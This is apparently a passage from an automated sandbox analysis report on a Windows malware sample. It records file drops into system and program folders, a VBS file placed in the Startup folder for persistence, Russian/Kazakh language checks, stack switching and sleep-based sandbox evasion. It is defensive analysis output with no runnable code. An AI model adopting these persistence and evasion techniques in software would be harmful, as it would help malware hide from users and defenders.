              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file

              Boot Survival

              barindex
              Drops VBS files to the startup folder
              Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to dropped file
              Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Creates files inside the volume driver (system volume information)
              Source: C:\Windows\System32\TieringEngineService.exeFile created: C:\System Volume Information\Heat\
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_0047A330
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00434418
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,3_2_0047A330
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,3_2_00434418
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Contains functionality to behave differently if execute on a Russian/Kazak computer
              Source: C:\Windows\System32\AppVClient.exeCode function: 12_2_005352A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 12_2_005352A0
              Source: C:\Windows\System32\FXSSVC.exeCode function: 15_2_009852A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 15_2_009852A0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_01A352A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 19_2_01A352A0
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: 4C1025C
              Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: 4CE62A4
              Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: 4CD9264
              Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: 4C1728C
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 1996Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 6864Jump to behavior
              Source: C:\Windows\System32\msdtc.exeWindow / User API: threadDelayed 488
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Windows\System32\msiexec.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeDropped PE file which has not been started: C:\Windows\System32\sppsvc.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\directory\name.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-85130
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-66728
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\FXSSVC.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeAPI coverage: 4.0 %
              Source: C:\Users\user\AppData\Local\directory\name.exeAPI coverage: 3.7 %
              Source: C:\Users\user\AppData\Local\directory\name.exeAPI coverage: 3.6 %
              Source: C:\Windows\SysWOW64\svchost.exe TID: 4956Thread sleep count: 1996 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 4956Thread sleep time: -5988000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7080Thread sleep time: -510000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 4956Thread sleep count: 6864 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 4956Thread sleep time: -20592000s >= -30000sJump to behavior
              Source: C:\Windows\System32\alg.exe TID: 5780Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Windows\System32\alg.exe TID: 7028Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe TID: 7492Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\msdtc.exe TID: 7720Thread sleep count: 488 > 30
              Source: C:\Windows\System32\msdtc.exe TID: 7720Thread sleep time: -48800s >= -30000s
